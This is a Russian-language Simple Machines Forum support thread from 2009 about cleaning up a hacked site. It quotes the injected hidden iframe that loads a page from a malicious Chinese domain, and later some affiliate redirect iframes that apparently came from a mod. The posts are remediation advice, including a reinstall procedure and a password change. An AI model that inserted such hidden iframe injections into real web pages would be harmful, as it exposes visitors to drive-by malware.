Взломали сайт и добавили фрейм

Автор Xuga, 15 июня 2009, 12:01:36

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Xuga

Добрый день.
Ситуация следующая на сайт была атака в результате которой во всех файлах index был прописан вредоносный кодик.
Я смог удалить все за исключением небольшого фрейма http://forum.worldofjapan.ru/   
Откройте страничку и взгляните, шаблон съехал вниз из-за
<iframe width="182" height="199" style="visibility: hidden;" src="http://cubanbigtop.cn:8080/index.php"/>

Подскажите как эту гадость удалить. Я никак не могу найти строчку за нее отвечающую.
ЗАРАНЕЕ ОГРОМНОЕС ПАСИБ!О

vladok

И не откроем -  :) нам ищщо вируса на компе не хватало :)))

Ок.

http://www.simplemachines.ru/index.php/topic,6913.0.html

и общий поиск по форуму на iframe поможет отцу интернет демократии :)
Харе кришна, май либер зольдат...

Xuga

Вся проблема заключается в том, что я так и сделал но никакого эффекта ((((

Xuga

я просто взял и перезалил с дистрибутива все что тока мона.
моды слетели, но фрейм остался. В самом верху сайта.....
есть еще варианты как лечить?

Xuga

Решил воспользоваться методом "Топора".
1. Сохранил файл Сеттингс.пхп
2. Сохраняем папочки: attachments и avatars (обязательно замените в них все файлы index.php на те, что в дистрибутиве)
2. Удалил все папки и файлы с вебсервера
3. Перезалил все из дистрибутива
4. Удалил файл инстал.пхп и сеттингс.пхп
5. Перезалил сохраненный в пункте (1) файл Сеттингс.пхп
6. Заливаем папочки из пункта (2) не забывайте про index.php
7. Если у Вас отображается кракозябра смените темы (проблема в кодировке)

Финита ля комедия....
А ну и модули переустановите

Спасибо всем за помошь!!!!!!!!!!
Пожалуйста закройте тему.

vladok

Комп вылечи и пассы на фтп смени... а то все повторится.
Харе кришна, май либер зольдат...

Макар

Сижу себе спокойно удаляю моды , на тестовой версии форума (расположена в папке основного форума)
и тут после удаления очередного пакета модификации в админке вылазит
в шапке фрейм с рекламой айфона
в приваси полис ссылка redirectportal.azoogleads.com/?affil=20140-smfhacks&traffic_type_id=3&t=mobile&offer_id=7254#

в прикрепленных файлах скрин и архив с исходным кодом страницы и самой страницей сохраненной их оперы
Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

vladok

Эо тебе имхо так автор мода с smfhacks.com "наказал". За что то там... за галерею Про что ли :)
См самый верх кода транички-  айфрейм там.
ИМХО не вирус а открутка рекламы.
Харе кришна, май либер зольдат...

vladok

И ведет он через smfhacks.com  на... сек...

<html>
<title>10 complimentary tones!</title>
<body>
<iframe src="http://x.azjmp.com/0KzPd?sub=smfhacks" frameborder="0" scrolling="No" height="850" width="100%"></iframe>
</body>
</html>
Харе кришна, май либер зольдат...

vladok

Поймай vbgamer45-а ( http://custom.simplemachines.org/mods/index.php?action=profile;u=24876 ) на СМФ форуме или на его smfhacks.com и спроси что за фигня :)
Харе кришна, май либер зольдат...

Макар

Ага, уже проконсультировался. Никаких галерей у меня нет . . .
вероятнее всего открутка баннеров разработчиками модов. От них стояло вроде два или три шутки. Ну да и бог с ними, на то и тестовая версия что бы вот такое вылавливать. Однох . . . хотел тест версию пере установить в целях тренировки и т.д. и т.п.
Если Вы здесь недавно, не обольщайтесь тоном некоторых дискуссий.
Все чаще слова - юзай поиск, приобретают смысл - иди в ж..........  Приобретение смысла автоматизированно - Ответы на любой вопрос по SMF
Не пишите несколько сообщений подряд - тут вам не Twitter  >:( в остальных ситуациях мы не сильно зверствуем 2funny

RBW

Вот пакостники....
Надо обязательно на сайте делать "report as unsafe mod"..